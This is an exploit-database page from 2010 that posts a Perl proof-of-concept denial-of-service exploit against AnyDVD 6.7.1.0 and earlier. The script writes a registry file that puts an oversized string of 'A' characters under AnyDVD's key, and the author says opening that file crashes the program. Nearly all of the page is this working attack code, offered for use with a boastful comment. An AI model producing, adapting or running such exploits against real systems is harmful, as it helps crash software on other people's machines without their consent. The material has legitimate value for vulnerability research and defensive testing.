[dos / poc] - AnyDVD <= 6.7.1.0 Denial Of Service
Posted on 23 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>AnyDVD <= 6.7.1.0 Denial Of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='AnyDVD <= 6.7.1.0 Denial Of Service by Lance M. Havok in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=================================== AnyDVD <= 6.7.1.0 Denial Of Service =================================== #!/usr/bin/perl #AnyDVD <= 6.7.1.0 Denial Of Service Vulnerability #By Havok, from France. (c'est les vacances o/. Mais y a plus d'essence :(. Rime de leet spotted :P). #23/10/2010 #Tested on Windows XP SP3. #Software still available here at the moment : http://static.slysoft.com/SetupAnyDVD.exe #It seems that RegAnyDVD.exe is our friend. :) my $w00T_omg= "x41" x 7777; open(file,">DoS.AnyDVD"); print file "REGEDIT4 "; print file "[HKEY_LOCAL_MACHINE\Software\SlySoft\AnyDVD\Key] "; print file ""Key"="$w00T_omg""; print "The file has been created successfully. Open it and BOOM. Cheers!"; close(file); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-23]</pre></body></html>